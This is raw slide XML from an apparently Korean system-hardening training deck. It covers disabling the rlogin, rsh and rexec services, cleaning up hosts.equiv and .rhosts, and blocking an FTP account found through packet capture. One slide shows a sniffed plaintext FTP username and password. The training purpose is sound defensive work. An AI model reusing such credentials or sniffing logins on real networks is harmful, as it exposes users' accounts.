          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124364516"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="611934" y="4114973"/>
          <a:ext cx="4932807" cy="492506"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="67807887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grep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97119472"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2346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파일에서 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>키워드가 포함된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모두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5096598"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37881960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/Training/Unit/Sys/3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>R-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>명령어 제한</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196706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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, rexec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수록된 호스트 정보를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삭제하시오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호스트 정보 파일의 소유자 외에는 접근할 수 없도록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98199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 편집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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19024674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rlogin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/rlogin</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rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rsh</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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) rexec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a:t>/rexec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4) R-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 비활성화 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>cat /etc/xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>rlogin /etc/xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> /etc/xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/rexec | grep disable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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) /etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.equiv </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 호스트 정보 삭제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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="그림 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08117098-AC2E-4AF9-9B78-9B94DCD8EB80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-2" r="505" b="39473"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="682069" y="1553846"/>
            <a:ext cx="4777613" cy="1568565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{705017E2-13E1-4A43-9389-2A1938DE6AD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="1" r="-1694" b="38526"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="682069" y="3693635"/>
            <a:ext cx="4858531" cy="1580492"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38D9FDA7-4D1A-471D-A4F2-45FC2B0ED4D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6346853" y="1327531"/>
            <a:ext cx="4975733" cy="734187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="그림 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06C07CCF-A532-44CD-A607-091A7696E30F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6346853" y="3020251"/>
            <a:ext cx="3863445" cy="3340535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29808422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6) /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 호스트 정보 삭제</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># vi /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts</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xinetd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># service xinetd restart</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0705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/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.equiv </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일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a:t>700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ls –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>l /etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.equiv</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/root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의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700 /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8E8F543-4B21-4BE2-A553-C48DB650CEC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2131121466"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="633303" y="515452"/>
          <a:ext cx="4932807" cy="1224026"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="267394794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etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>hosts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>.equiv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91365527"/>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 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548446"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="표 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E95D251-DD24-49C0-B60E-4994D7E7A136}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2408794911"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="633303" y="2867809"/>
          <a:ext cx="4932807" cy="1711706"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="51772631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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>rhost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596990713"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1453896">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" fontAlgn="base" latinLnBrk="1">
                        <a:lnSpc>
                          <a:spcPct val="160000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>hosts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>.equiv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파일과 유사하게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hosts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>.equiv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시스템에 전역적으로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(globally)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적용되지만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rhost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해당 계정 접근 시에만 적용된다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992199"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{968E0337-4106-4EAC-BF96-386F65B18568}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="632732" y="5380115"/>
            <a:ext cx="5019040" cy="670433"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8548DEE-1065-4E82-B67E-6CE038ADB89D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6391728" y="1111454"/>
            <a:ext cx="4861560" cy="1089660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D747B25A-341F-4D83-BF42-F6B408465DC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6391728" y="3216932"/>
            <a:ext cx="4602480" cy="1013460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81FEDB8B-2514-4783-911F-090859734658}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="4522543"/>
            <a:ext cx="5616792" cy="1966456"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33152047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/Training/Unit/Sys/4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>계정 원격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서비스에 접속하여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중인 사용자를 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설정을 통해 해당 계정의 접속을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캡처 및 저장 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패킷수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저장된 패킷 보기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사용자 목록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원격 접속을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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33959796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200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>개의 패킷 캡처 및 저장</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저장된 패킷 검토</a:t>
            </a:r>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navy123 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>비밀번호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>: qwer1031</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>사용자가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 접속했음을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>차단 사용자 목록에 해당 계정 추가</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9"/>
            <a:ext cx="5616792" cy="505208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en-US" altLang="ko-KR" sz="1000"/>
              <a:t>vi /etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>_list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   맨 마지막에 ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>navy123’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력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vsftpd</a:t>
            </a:r>
